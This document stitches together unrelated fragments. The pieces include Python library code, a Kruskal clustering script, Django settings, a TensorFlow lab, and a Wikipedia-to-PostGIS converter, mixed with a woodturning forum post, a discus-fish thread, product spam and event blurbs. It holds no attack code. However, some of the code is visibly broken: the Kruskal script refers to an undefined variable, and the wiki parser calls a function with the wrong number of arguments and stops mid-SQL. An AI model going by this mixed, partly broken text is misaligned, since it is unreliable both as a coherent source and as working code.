'_force_quotes',
'_quoting',
'_value',
'_verbatim',
)
### INITIALIZER ###
def __init__(self, *args, **kwargs):
if 1 == len(args):
if isinstance(args[0], type(self)):
args = args[0]._value
else:
args = args[0]
quoting = kwargs.get('quoting')
force_quotes = bool(kwargs.get('force_quotes'))
verbatim = kwargs.get('verbatim')
assert isinstance(quoting, (str, type(None)))
if quoting is not None:
assert all(x in ("'", ',', '@', '`', '#') for x in quoting)
self._force_quotes = force_quotes
self._quoting = quoting
self._value = args
self._verbatim = bool(verbatim)
### SPECIAL METHODS ###
def __format__(self, format_specification=''):
r'''Formats scheme.
Set `format_specification` to `''`', `'lilypond'` or ``'storage'``.
Interprets `''` equal to `'lilypond'`.
.. container:: example
**Example 1.** Scheme LilyPond format:
::
>>> scheme = schemetools.Scheme('foo')
>>> format(scheme)
'#foo'
.. container:: example
**Example 2.** Scheme storage format:
::
>>> print(format(scheme, 'storage'))
schemetools.Scheme(
'foo'
)
Returns string.
'''
from abjad.tools import systemtools
if format_specification in ('', 'lilypond'):
return self._lilypond_format
elif format_specification == 'storage':
return systemtools.StorageFormatManager.get_storage_format(self)
return str(self)
def __getnewargs__(self):
r'''Gets new arguments.
Returns tuple.
'''
return (self._value,)
def __str__(self):
r'''String representation of scheme object.
Returns string.
'''
if self._quoting is not None:
return self._quoting + self._formatted_value
return self._formatted_value
### PRIVATE PROPERTIES ###
@property
def _formatted_value(self):
from abjad.tools import schemetools
return schemetools.Scheme.format_scheme_value(
self._value,
force_quotes=self.force_quotes,
verbatim=self.verbatim,
)
@property
def _lilypond_format(self):
if self._quoting is not None:
return '#' + self._quoting + self._formatted_value
return '#%s' % self._formatted_value
@property
def _storage_format_specification(self):
from abjad.tools import systemtools
if stringtools.is_string(self._value):
positional_argument_values = (self._value,)
else:
positional_argument_values = self._value
keyword_argument_names = []
if self.force_quotes:
keyword_argument_names.append('force_quotes')
if self.quoting:
keyword_argument_names.append('quoting')
return systemtools.StorageFormatSpecification(
self,
keyword_argument_names=keyword_argument_names,
positional_argument_values=positional_argument_values,
)
### PUBLIC METHODS ###
@staticmethod
def format_embedded_scheme_value(value, force_quotes=False):
r'''Formats `value` as an embedded Scheme value.
'''
from abjad.tools import datastructuretools
from abjad.tools import schemetools
result = Scheme.format_scheme_value(value, force_quotes=force_quotes)
if isinstance(value, bool):
result = '#{}'.format(result)
elif isinstance(value, datastructuretools.OrdinalConstant):
result = '#{}'.format(repr(value).lower())
elif isinstance(value, str) and not force_quotes:
result = '#{}'.format(result)
elif isinstance(value, schemetools.Scheme):
result = '#{}'.format(result)
return result
@staticmethod
def format_scheme_value(value, force_quotes=False, verbatim=False):
r'''Formats `value` as Scheme would.
.. container:: example
**Example 1.** Some basic values:
::
>>> schemetools.Scheme.format_scheme_value(1)
'1'
::
>>> schemetools.Scheme.format_scheme_value('foo')
'foo'
::
>>> schemetools.Scheme.format_scheme_value('bar baz')
'"bar baz"'
::
>>> schemetools.Scheme.format_scheme_value([1.5, True, False])
'(1.5 #t #f)'
.. container:: example
**Example 2.** Strings without whitespace can be forcibly quoted
via the `force_quotes` keyword:
::
>>> schemetools.Scheme.format_scheme_value(
... 'foo',
... force_quotes=True,
... )
'"foo"'
.. container:: example
**Example 3.** Set verbatim to true to format value exactly (with
only hash preprended):
::
>>> string = '(lambda (grob) (grob-interpret-markup grob'
>>> string += r' #{ \markup \musicglyph #"noteheads.s0harmonic" #}))'
>>> schemetools.Scheme.format_scheme_value(string)
'"(lambda (grob) (grob-interpret-markup grob #{ \\markup \\musicglyph #\\"noteheads.s0harmonic\\" #}))"'
Returns string.
'''
from abjad.tools import schemetools
if isinstance(value, str) and not verbatim:
value = value.replace('"', r'\"')
if -1 == value.find(' ') and not force_quotes:
return value
return '"{}"'.format(value)
elif isinstance(value, str) and verbatim:
return value
elif isinstance(value, bool):
if value:
return '#t'
return '#f'
elif isinstance(value, (list, tuple)):
return '({})'.format(
' '.join(schemetools.Scheme.format_scheme_value(x)
for x in value))
elif isinstance(value, schemetools.Scheme):
return str(value)
elif isinstance(value, type(None)):
return '#f'
return str(value)
### PUBLIC PROPERTIES ###
@property
def force_quotes(self):
r'''Is true when quotes should be forced in output. Otherwise false.
Returns boolean.
'''
return self._force_quotes
@property
def quoting(self):
r'''Gets Scheme quoting string.
Return string.
'''
return self._quoting
@property
def verbatim(self):
r'''Is true when formatting should format value absolutely verbatim.
Whitespace, quotes and all other parts of value are left in tact.
Defaults to false.
Set to true or false.
Returns true or false.
'''
return self._verbatim |
It’s been awhile since I’ve posted any projects so I thought I’d post a couple that I’m kind of proud of. The first is a bias bowl turned from plywood. The blank was about 4.5” square that I glued up from scrap baltic birch. It was turned mostly with EWT’s as the plywood dulled my Thompson bowl gouge very quickly. It is finished with gloss deft spray laquer.This one won me a blue ribbon at the Oklahoma State Fair last September. The second is a bowl that won second place. It’s turned from a piece of spalted hackberry. This one is finished with Mylands friction polish.
I remember seeing these bowls just this past year. I really liked the plywood bowls. I told my wife, that looks like a turning tool duller. But they came out gorgeous. Great work!
With those gorgeous grains and awesome shapes, they are sure winners. Great job! |
"""
Computer Science Department (SCC)
Mathematics and Computer Science Institute (ICMC)
University of Sao Paulo (USP)
Algorithms Projects
Teacher: Gustavo Batista
Author: Arthur Fortes da Costa
Method Kruskal
"""
from vertexFunctions import *
from readFile import readFile
from unionFind import unionFind
from operator import itemgetter
def kruskal(nodes, edges, cluster):
forest = unionFind()
mst = []
for n in nodes:
forest.add(n)
sz = len(nodes) - 1
for e in sorted(edges, key=itemgetter(2)):
n1, n2, _ = e
t1 = forest.find(n1)
t2 = forest.find(n2)
if t1 != t2:
mst.append(e)
sz -= 1
if sz == (cluster-1):
return mst
forest.union(t1, t2)
edges = []
nodes = []
edges, nodes, vertex = readFile("base.txt")
result = kruskal(nodes, edges, 7)
buildVertex(vertex)
addNeighbor(result)
ColorVertex()
resp = open("kruskalCut.txt", 'w')
for u in range(len(k)):
resp.write(str(k[u].no)+str("\n"))
resp.write(str("Coordenada: ")+str("(")+str(k[u].dx)+str(", ")+ str(k[u].dy)+str(")")+str("\n"))
resp.write(str("Vizinhos: ")+str(k[u].neighbor)+str("\n"))
resp.write(str("Cor: ")+str(k[u].color)+str("\n"))
resp.write(str("\n"))
resp.close()
dig = open("kruskal.txt", 'w')
for u in range(len(k)):
dig.write(str(k[u].dx)+str("\t")+str(k[u].dy)+str("\t")+str(k[u].color)+str("\n"))
dig.close()
|
In Western Pennsylvania, Yinzer and Jagoff are terms of endearment.
Saying “dahntahn” is as much a beloved tradition as putting fries on your sammich or waving a yellow towel! That’s why Pittsburgh radio personalities Jim Krenn and Larry Richert have teamed up with cartoonist Rob Rogers to create Yinzer Cards as a way of celebrating the city they love. Join them in sending humorous Pittsburgh greetings to all of your friends and family!
In Western Pennsylvania, Yinzer Cards are available exclusively at Giant Eagle and Market District stores. |
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p+7p7lv_36$-f+@bw=verpk$o&e(#6@79et^7=819!_1i8vxnp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
|
excellent products and competitive selling prices. We warmly welcome clients from your home and overseas to cooperate with us for Galvanized Tree Grating , Galvanized Steel Grating , Electro Galvanized Steel Grating , We warmly welcome clients from all around the world for almost any sort of cooperation with us to build a mutual advantage potential. We've been devoting ourselves wholeheartedly to supply consumers the very best company.
"Along with the ""Client-Oriented"" small business philosophy, a rigorous high-quality handle system, highly developed producing machines and a powerful R&D group, we always supply high-quality products and solutions, fantastic services and aggressive costs for Galvanized Tree Grating , Galvanized Steel Grating , Electro Galvanized Steel Grating , We hope to have long-term cooperation relationships with our clients. If you are interested in any of our products and solutions please do not hesitate to send enquiry to us/company name. We ensure that you can be totally satisfied with our best solutions! |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Group.slug'
db.add_column(u'playlists_group', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Playlist.slug'
db.add_column(u'playlists_playlist', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
# Adding field 'Category.slug'
db.add_column(u'playlists_category', 'slug',
self.gf('django.db.models.fields.SlugField')(default='slug-default', max_length=200),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Group.slug'
db.delete_column(u'playlists_group', 'slug')
# Deleting field 'Playlist.slug'
db.delete_column(u'playlists_playlist', 'slug')
# Deleting field 'Category.slug'
db.delete_column(u'playlists_category', 'slug')
models = {
u'playlists.category': {
'Meta': {'ordering': "['name']", 'object_name': 'Category'},
'categoryid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Group']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the category'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'})
},
u'playlists.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'groupid': ('django.db.models.fields.CharField', [], {'max_length': '200', 'primary_key': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'default': "'Some, key, words'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the group'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'stations': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['playlists.Playlist']", 'symmetrical': 'False'})
},
u'playlists.playlist': {
'Meta': {'ordering': "['name']", 'object_name': 'Playlist'},
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'creator': ('django.db.models.fields.CharField', [], {'default': "'The creator of the playlist'", 'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "'A description of the playlist'", 'max_length': '200'}),
'featured_artists': ('django.db.models.fields.CharField', [], {'default': "'A, list, of, the artists, formatted, like, this'", 'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'The name of the playlist'", 'max_length': '200'}),
'playlistid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'song_count': ('django.db.models.fields.IntegerField', [], {}),
'songs': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['songs.Song']", 'symmetrical': 'False'}),
'songza_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'spotify_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'songs.song': {
'Meta': {'ordering': "['title']", 'object_name': 'Song'},
'album': ('django.db.models.fields.CharField', [], {'default': "'Album name'", 'max_length': '200'}),
'artist': ('django.db.models.fields.CharField', [], {'default': "'Artist name'", 'max_length': '200'}),
'cover_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'duration': ('django.db.models.fields.IntegerField', [], {}),
'genre': ('django.db.models.fields.CharField', [], {'default': "'Song genre'", 'max_length': '200'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200'}),
'songid': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Song title'", 'max_length': '200'})
}
}
complete_apps = ['playlists'] |
This document contains safety, operating, disposal, and regulatory information for Focals and accessories. Read all safety information and operating instructions before using Focals to avoid injury or damage.
While wearing Focals, press the power button 5 times to get regulatory information for Focals and Loop on your display. |
# Copyright (c) 2014 Marist SDN Innovation lab Joint with Plexxi Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class MockProperty(object):
def __init__(self, val, name):
self.val = val
self.name = name
class MockDNSInfo(object):
def __init__(self, string):
self.string = string
class MockvCenterHost(dict):
def __init__(self, obj):
self.obj = obj
class MockNicContainer(object):
def __init__(self, nicList):
self.PhysicalNic = nicList
self.HostVirtualNic = nicList
|
Four remarkable musicians, former and current players from La Scala in Milan, will be coming especially to the Vez Dungeon.
The barytone Romain Dayez offers a remarkable artistic performance mixing sacred ancient religious music with electro. A contemporary creation combining music and dancing.
Thibaut Garcia, young musical prodigy with an international career, won in February the Victoire de la Musique Classique 2019 contest.
Matthew Tutsky, first solo harpist in many American orchestras, will be coming specially to France for this concert at the Dungeon. |
# Lab 5 Logistic Regression Classifier
import tensorflow as tf
import numpy as np
tf.set_random_seed(777) # for reproducibility
xy = np.loadtxt('data-03-diabetes.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, y_data.shape)
# placeholders for a tensor that will be always fed.
X = tf.placeholder(tf.float32, shape=[None, 8])
Y = tf.placeholder(tf.float32, shape=[None, 1])
W = tf.Variable(tf.random_normal([8, 1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# Hypothesis using sigmoid: tf.div(1., 1. + tf.exp(tf.matmul(X, W)))
hypothesis = tf.sigmoid(tf.matmul(X, W) + b)
# cost/loss function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) *
tf.log(1 - hypothesis))
train = tf.train.GradientDescentOptimizer(learning_rate=0.01).minimize(cost)
# Accuracy computation
# True if hypothesis>0.5 else False
predicted = tf.cast(hypothesis > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
with tf.Session() as sess:
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(10001):
cost_val, _ = sess.run([cost, train], feed_dict={X: x_data, Y: y_data})
if step % 200 == 0:
print(step, cost_val)
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy],
feed_dict={X: x_data, Y: y_data})
print("\nHypothesis: ", h, "\nCorrect (Y): ", c, "\nAccuracy: ", a)
'''
0 0.82794
200 0.755181
400 0.726355
600 0.705179
800 0.686631
...
9600 0.492056
9800 0.491396
10000 0.490767
...
[ 1.]
[ 1.]
[ 1.]]
Accuracy: 0.762846
'''
|
1. My runt tends to get black every so often... but will lighten up i saw white poop once but after i did my 60% WC and raised the temp to 90-92 for 3 days it went away its been about 4 days now.... i know i should have asked here first but i havent had the time to get on :/ was what i did okay?
3. I see these small worms every now and then they are really small and swim sideways in a S movement... are these bad? if they are what do i need to do to get rid of them?
4. For my water changes i am using a 30 gallon trashcan and 2 5 gallon containers and i heat the trashcan to 85F as well and run a pump on it for 1 hour or so before my water changes.... i try to leave it out for 24 hours before my water changes. i just wanted to know if this is considered aging my water... and how long does water need to be out for it to be aged?
I Guarantee more questions to come SORRY and THANK YOU for any responses.
Raising the Temp is ok for certain things but if you see white poop one time and raise your temp for that sounds a little excessive to me. You can raise your temp but with some bacterial infections it can cause more harm then good. Its better to know why your raising the temperature than just start cranking it up. As far as the fish turning black that means something is definitely wrong and causing stress to the fish. I would need more info to properly give you some advise.
Josie.......where did you get the discus from and how old are they?
Okay thank you :) and yeah i was thinking about why i raised the temp and i just want to keep them healthy and was a little quick to pull the trigger. I got them from Tony. and they are 3months old for the smallest i believe he said.... may have been 2....honestly i cant remember :/ but thank you for responding :) much appreciated. |
import os, subprocess
import numpy as np
import h5py
import json
from image import image
class Operation:
def __init__(self):
pass
# generate image for each sequence
def generate_image(self, source, target, num_channel, origin_size=32,
out_size=32, bound=15.0, bin_image='image/bin/image'):
if not os.path.exists(target): os.makedirs(target)
# run flow command
p = subprocess.Popen([bin_image,
'--source', source, '--target', target,
'--channel', str(num_channel),
'--origin', str(origin_size),
'--out', str(out_size),
'--bound', str(bound)])
p.wait()
# generate label file
self._generate_label(source, target)
# load labels
def _generate_label(self, source, target, label_file='label.json'):
with h5py.File(source, 'r') as hf:
labels = [int(l) for l in hf['label'][()]]
# save labels as a dict in json file
labels_dict = {i: l
for i, l in zip(range(len(labels) - 1), labels[1:])}
with open(os.path.join(target, label_file), 'w') as jf:
json.dump(labels_dict, jf)
# delete generated image files
def clean_image(self, file_dir, label_file='label.json'):
print 'Cleaning', file_dir
# delete images in dir
image_files = [os.path.join(file_dir, f)
for f in os.listdir(file_dir)
if os.path.isfile(os.path.join(file_dir, f)) and 'jpg' in f]
for image_file in image_files:
try:
os.remove(image_file)
except Exception, e:
print e
# delete label file
try:
os.remove(os.path.join(file_dir, label_file))
except Exception, e:
print e
# delete dir
try:
os.rmdir(file_dir)
except Exception, e:
print e
# get frame count
def _get_frame_num(self, source, label_file='label.json'):
with open(os.path.join(source, label_file), 'r') as jf:
labels_dict = json.load(jf)
return len(labels_dict)
# setup mean counter and accumulator at the beginning
def setup_mean(self, num_channel, out_size):
self.image_sums = {}
self.count = 0.0
for c in range(num_channel):
self.image_sums['ch%i_image' % (c,)] = \
np.zeros((1, out_size, out_size), dtype='float32')
# accumulate mean for each sequence
def accum_mean(self, source, num_channel, out_size):
print 'Loading mean', source
frame_num = self._get_frame_num(source)
self.count += frame_num
for c in range(num_channel):
for i in range(frame_num):
image_name = os.path.join(source,
'ch%i_%i_image.jpg' % (c, i))
self.image_sums['ch%i_image' % (c,)] += \
image(image_name).load(out_size, out_size)
# save accumulated mean to file
def save_mean(self, mean_file, num_channel):
# store file as hdf5
if mean_file.endswith('h5'):
print 'Save as hdf5'
with h5py.File(mean_file, 'w') as f:
for c in range(num_channel):
f.create_dataset('ch%i_image' % (c,),
data=self.image_sums['ch%i_image' % (c,)]
/ self.count)
# store file as matlab data
elif mean_file.endswith('mat'):
import scipy.io as sio
print 'Save as mat'
data = {}
for c in range(num_channel):
data['ch%i_image' % (c,)] = \
self.image_sums['ch%i_image' % (c,)] / self.count
sio.savemat(mean_file, data)
|
Welcome to Oran V. Siler Printing. Since 1919 we have provided top quality printing services to the Metro Denver area.
Siler Printing has evolved from a single color/duplication operation to a multi-color/four color process printer, assisted by a complete art and camera department with the latest in desktop publishing technology. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
import xml.etree.cElementTree as xml
import codecs
from string import replace
def parseGeoLocation(geo_cz,geo_dms,geo,coord):
try:
toNumber = lambda s:float(replace(s,u",",u"."))
if geo_cz:
x = geo_cz.split('|')
return (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[3]) + toNumber(x[4])/60.0 + toNumber(x[5])/3600.0)
elif geo_dms:
x = geo_dms.split('|')
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[5]) + toNumber(x[6])/60.0 + toNumber(x[7])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[8]=='W':
ret = (ret[0],-ret[1])
return ret
elif geo:
x = geo.split('|')
x = x[0].split('_')
if x[3] in ['S','N'] and x[7] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0 + toNumber(x[2])/3600.0,toNumber(x[4]) + toNumber(x[5])/60.0 + toNumber(x[6])/3600.0)
if x[3]=='S':
ret = (-ret[0],ret[1])
if x[7]=='W':
ret = (ret[0],-ret[1])
return ret
elif x[2] in ['S','N'] and x[5] in ['W','E']:
ret = (toNumber(x[0]) + toNumber(x[1])/60.0,toNumber(x[3]) + toNumber(x[4])/60.0)
if x[2]=='S':
ret = (-ret[0],ret[1])
if x[5]=='W':
ret = (ret[0],-ret[1])
return ret
elif coord:
pass;
return None;
except:
return None;
sys.stdout=codecs.getwriter('utf-8')(sys.stdout)
source = sys.stdin
context = iter(xml.iterparse(source, events=("start", "end")))
_,root = context.next()
geo_cz_pattern = re.compile(ur"{{(?:g|G)eo cz\|([^}{]+)}}");
geo_dms_pattern = re.compile(ur"{{(?:g|G)eo dms\|([^}{]+)}}");
geo_pattern = re.compile(ur"{{(?:g|G)eo\|([^}{]+)}}");
coord_pattern = re.compile(ur"{{(?:c|C|k|K)oord(?:ynaty)?\|([^}{]+)}}");
category_pattern = re.compile(ur"\[\[(?:k|K)ategorie:([^\]\|]+)(?:\|[^\]]*)?\]\]");
infobox_pattern = re.compile(ur"{{(?:i|I)nfobox[\s-]*([^\|]+)\|[^}]*}}");
#ele_pattern = re.compile(ur"\|/s*vrchol/s*=/s*([0..9]+)");
ele_pattern = re.compile(ur"\| (?:vrchol|kóta) = ([0-9\s]+)");
population_pattern = re.compile(ur"\| (?:obyvatelé) = ([0-9\s\.]+)");
status_pattern = re.compile(ur"\| (?:status) = ([^\s]+)");
name_pattern = re.compile(ur"(?:\|)? (?:název) = (.+)");
print """
DROP TABLE IF EXISTS "wiki";
SELECT DropGeometryColumn('public','wiki', 'way');
CREATE TABLE "wiki" (
"id" BIGINT PRIMARY KEY,
"title" VARCHAR(511),
"name" VARCHAR(511),
"infobox" VARCHAR(127),
"status" VARCHAR(127),
"ele" INT,
"population" INT,
"cats" VARCHAR(1023),
"text_length" INT,
"historic" VARCHAR(127),
"castle_type" VARCHAR(127),
"ruins" INT,
"amenity" VARCHAR(127),
"religion" VARCHAR(63),
"place_of_worship" VARCHAR(63),
"tourism" VARCHAR(63),
"natural" VARCHAR(127),
"nkp" INT,
"kp" INT,
"osm_id" BIGINT
);
SELECT AddGeometryColumn('wiki', 'way', 900913, 'POINT', 2);
"""
page = False
id = 0;
for event, elem in context:
if elem.tag == "{http://www.mediawiki.org/xml/export-0.6/}page":
page = event == 'start'
if event == 'end':
if geo_cz or geo_dms or geo:
cats = ';'.join(categories) if categories else ''
id += 1;
tmp = parseGeoLocation(geo_cz, geo_dms,geo)
if tmp:
print "INSERT INTO wiki (id,way,title,name,infobox,status,ele,population,cats,text_length) VALUES (%(id)s,ST_Transform(ST_SetSRID(ST_MakePoint(%(lon)s,%(lat)s),4326),900913),%(title)s,%(name)s,%(infobox)s,%(status)s,%(ele)s,%(population)s,%(cats)s,%(text_length)s);" % {
'id': id,
'lat': tmp[0],
'lon': tmp[1],
'title': ("'" + replace(title,"'","''") + "'") if title else 'null',
'name': ("'" + replace(name,"'","''") + "'") if name else 'null',
'infobox': ("'" + infobox + "'") if infobox else 'null',
'status': ("'" + replace(status,"'","''") + "'") if status else 'null',
'ele': ("'" + str(ele) + "'") if ele else 'null',
'population': ("'" + str(population) + "'") if population else 'null',
'cats': ("'" + replace(cats,"'","''") + "'") if cats else 'null',
'text_length': ("'" + str(text_length) + "'") if text_length else 'null'
}
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
elif page and event == 'end':
if elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}title':
title = elem.text
elif elem.tag=='{http://www.mediawiki.org/xml/export-0.6/}text':
if elem.text:
text = replace(elem.text,' ',' ')
text_length = len(text)
geo_cz = geo_cz_pattern.search(text)
geo_cz = geo_cz.group(1) if geo_cz else None
geo_dms = geo_dms_pattern.search(text)
geo_dms = geo_dms.group(1) if geo_dms else None
geo = geo_pattern.search(text)
geo = geo.group(1) if geo else None
categories = category_pattern.findall(text)
infobox = infobox_pattern.search(text)
infobox = infobox.group(1).strip() if infobox else None
try:
ele = ele_pattern.search(text)
ele = int(re.sub("[^0-9]",'',ele.group(1))) if ele else None
except:
ele = None
try:
population = population_pattern.search(text)
population = int(re.sub("[^0-9]",'',population.group(1))) if population else None
except:
population = None
status = status_pattern.search(text)
status = status.group(1).strip() if status else None
name = name_pattern.search(text)
name = name.group(1).strip() if name else None
else:
text_length = name = population = status = ele = infobox = categories = geo_cz = geo_dms = geo = None
if event == 'end':
root.clear()
print """
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.place IN ('city','town','village','hamlet','isolated_dwelling','suburb','neighbourhood')
AND COALESCE(W.name,W.title) = P.name
AND ST_DWithin(W.way,P.way,3000)
AND W.population IS NOT NULL;
UPDATE wiki W
SET osm_id = P.osm_id
FROM planet_osm_point P
WHERE
P.natural = 'peak'
AND W.infobox = 'hora'
AND (
(ST_DWithin(W.way,P.way,300) AND COALESCE(W.name,W.title) = P.name)
OR (ST_DWithin(W.way,P.way,100) AND (W.name IS NULL OR P.name IS NULL))
OR ST_DWithin(W.way,P.way,30)
);
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('castle','ruins')
AND (
ST_DWithin(W.way,P.way,1000 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek|tvrz','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek|tvrz','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'hrad|z..cenina|z.mek','','i'),regexp_replace(P.name,'hrad|z..cenina|z.mek','','i')))
LIMIT 1
)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Tvrze %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'place_of_worship'
AND (
ST_DWithin(W.way,P.way,300 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'kostel','','i'),regexp_replace(P.name,'kostel','','i')))
LIMIT 1
)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,amenity FROM planet_osm_point
UNION SELECT osm_id,name,way,amenity FROM planet_osm_polygon) P
WHERE
P.amenity = 'theatre'
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'divadlo','','i'),regexp_replace(P.name,'divadlo','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,tourism FROM planet_osm_point
UNION SELECT osm_id,name,way,tourism FROM planet_osm_polygon) P
WHERE
P.tourism IN ('museum','gallery')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i'))))
)
